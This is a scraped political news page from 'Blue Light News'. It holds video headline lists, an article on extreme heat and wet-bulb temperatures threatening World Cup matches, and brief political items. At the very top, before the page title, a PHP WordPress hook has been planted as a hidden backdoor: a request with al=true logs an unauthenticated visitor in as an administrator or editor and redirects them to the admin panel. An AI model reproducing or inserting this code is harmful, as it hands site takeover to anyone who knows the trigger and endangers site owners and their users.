// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); ‘No threat to public’ after bomb threats, Pennsylvania governor says – Blue Light News
Connect with us

Politics

‘No threat to public’ after bomb threats, Pennsylvania governor says

Published

on

‘No threat to public’ after bomb threats, Pennsylvania governor says
  • UP NEXT

    What damage could RFK Jr. do to America’s public health system? This doctor explains her concerns

    05:35

  • First Black mayor of Tulsa Monroe Nichols on being elected mayor 103 years after Tulsa Race Massacre

    08:22

  • ‘Ability to underestimate Trump’ is biggest takeaway for Dems after election: Vanity Fair reporter

    07:07

  • Trump trying to ‘do away with every check and balance’ ahead of second term: Leibovich

    05:07

  • America ‘should be worried’ that Trump may use DOJ as his ‘personal law firm’: Fmr. PA Rep.

    06:57

  • Could Ukraine become Trump’s Afghanistan of foreign policy? Fmr. CIA officer explains

    05:05

  • ‘He will lose in court every day of the week’: Katyal on Trump’s immigration agenda

    07:39

  • Eddie Glaude: ‘We can’t capitulate’

    09:29

  • ‘We will not be cowed’: State AGs prepare to steer the anti-Trump resistance

    11:41

  • New Trump chief of staff is ‘one and only guardrail’ to stop him from going off the tracks: Omarosa

    06:09

  • Imani Perry: ‘We have to live according to our ethics as opposed to our fears’

    09:05

  • Velshi: We must confront our history

    03:24

  • ‘What now?’: Jen Psaki on what happened, where Democrats go from here

    12:11

  • Rep. Moulton defends comments about trans athletes: ‘The backlash I’ve received proves my point’

    11:59

  • Why not here? What’s holding us back from putting a woman in the White House

    08:21

  • NBC News projects Trump to win Arizona, recapturing swing state

    00:45

  • Almost everywhere but here: the American problem of women and the highest office

    06:58

  • Rhode Island Senator’s Message to Democrats on being ready ‘for an absolute tsunami of corruption’ 

    07:57

  • PA Congressman talks Dems reaching working class voters – and who exactly that is

    08:01

  • Aunt Gloria reacts to Kamala Harris’ loss: ‘America’s not done yet.’

    04:14

  • UP NEXT

    What damage could RFK Jr. do to America’s public health system? This doctor explains her concerns

    05:35

  • First Black mayor of Tulsa Monroe Nichols on being elected mayor 103 years after Tulsa Race Massacre

    08:22

  • ‘Ability to underestimate Trump’ is biggest takeaway for Dems after election: Vanity Fair reporter

    07:07

  • Trump trying to ‘do away with every check and balance’ ahead of second term: Leibovich

    05:07

  • America ‘should be worried’ that Trump may use DOJ as his ‘personal law firm’: Fmr. PA Rep.

    06:57

  • Could Ukraine become Trump’s Afghanistan of foreign policy? Fmr. CIA officer explains

    05:05

Read More

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Politics

It’s hot. Maybe too hot.

Published

on

High-stakes geopolitics aren’t the only external factor threatening to hijack the tournament.

Perhaps ironically for a competition hosted by a U.S. president who is highly skeptical about climate change and says assertions about rising temperatures have been made “by stupid people,” the heat is very likely to be a problem.

Heat waves have become a persistent part of Northern Hemisphere summers — each one made hotter, longer and more likely to occur as a result of man-made global warming. The locations of several stadiums across the U.S. and Mexico, as well as the peak-summer timing of the World Cup, are expected to put players and fans at risk of overheating.

The problem isn’t just heat, but also humidity. The combination of the two feels far hotter and is measured with wet-bulb temperature, which mimics how the human body cools off through sweating. A wet-bulb temperature of 95 degrees Fahrenheit can be fatal even to healthy people; the football players’ union FIFPRO says wet-bulb temperatures above 79 degrees — which can be reached through a combination of 86-degree heat and 50 percent humidity, for example — will affect performance and health, and 82-degree heat should prompt the postponement of a match.

When scientists last month ran the numbers, they found that 26 of 104 matches are expected to take place in conditions of at least 79-degree wet-bulb temperature. Five matches are estimated to breach the 82-degree wet-bulb barrier. And a peer-reviewed study found that during last year’s FIFA Club World Cup in the U.S., average wet-bulb temperature exceeded 82 degrees in 31 of 57 matches analyzed by scientists.

That study also found that high temperatures were associated with players covering less ground, forcing a change of tactics. Exhaustion sets in faster under high temperatures — at the Club World Cup, 10 players asked to be substituted in a single match. But heat doesn’t just affect gameplay. At the 2024 Copa America, an assistant referee collapsed in the heat and, last month, two people died during sports events held amid a heat wave in France.

As climate change continues to heat the planet, FIFA will have to grapple with the growing threat at every subsequent tournament. The 2030 men’s World Cup in Spain, Portugal and Morocco takes place in a global warming hotspot. The women’s World Cup next year will be in Brazil during a warming El Niño event, expected to supercharge the heating effect of climate change.

And that’s not even counting the other growing climate risks — from wildfire smoke to extreme rain — that threaten to disrupt future events.

Continue Reading

Politics

House Oversight requests Alan Dershowitz testify in Epstein probe

Published

on

House Oversight requests Alan Dershowitz testify in Epstein probe

Dershowitz, the criminal defense lawyer who once represented Jeffery Epstein, said he’d be open to answering the committee’s questions…
Read More

Continue Reading

Politics

Cornyn tells Mike Lee to lay off John Thune

Published

on

Cornyn tells Mike Lee to lay off John Thune

It’s the latest example of the outgoing Texas Republican beginning to speak more of his mind…
Read More

Continue Reading

Trending